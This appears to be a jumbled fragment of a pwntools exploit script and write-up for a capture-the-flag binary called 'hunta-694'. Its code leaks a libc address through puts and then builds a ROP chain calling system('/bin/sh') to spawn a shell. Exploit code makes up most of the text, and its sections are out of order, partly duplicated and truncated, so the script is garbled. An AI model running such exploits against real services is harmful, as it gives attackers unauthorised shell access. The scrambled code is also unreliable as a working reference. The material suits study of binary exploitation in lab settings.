leak_payload = flat( b'A' * offset, puts_plt, # call puts main_addr, # return to main after leak puts_got # argument to puts -> leak real puts address ) io.sendlineafter(b'> ', leak_payload)
# ---------------------------------------------------------------------- # Exploit # ---------------------------------------------------------------------- def main(): io = start()
context.binary = ELF context.terminal = ['tmux', 'splitw', '-h'] hunta-694
rop_payload = flat( b'A' * offset, pop_rdi, bin_sh, system ) io.sendlineafter(b'> ', rop_payload)
# ---------------------------------------------------------------------- # Configuration # ---------------------------------------------------------------------- HOST = '<remote_host>' # or None for local PORT = <remote_port> # or None for local BINARY = './hunta-694' # path to the binary (if local) ELF = ELF(BINARY) leak_payload = flat( b'A' * offset, puts_plt, #
# ---------------------------------------------------------------------- # Helper functions # ---------------------------------------------------------------------- def start(): if HOST and PORT: return remote(HOST, PORT) else: return process(BINARY)
$ nc <host> <port> or a local wrapper script ( run.sh ). Capture traffic with tcpdump / wireshark or socat . Below are the most common vulnerability patterns. Mark the ones that actually appear in hunta‑694 . Mark the ones that actually appear in hunta‑694
# ---- Step 3: Build final ROP chain -------------------------------- pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0] bin_sh = next(libc.search(b'/bin/sh')) system = libc.symbols['system']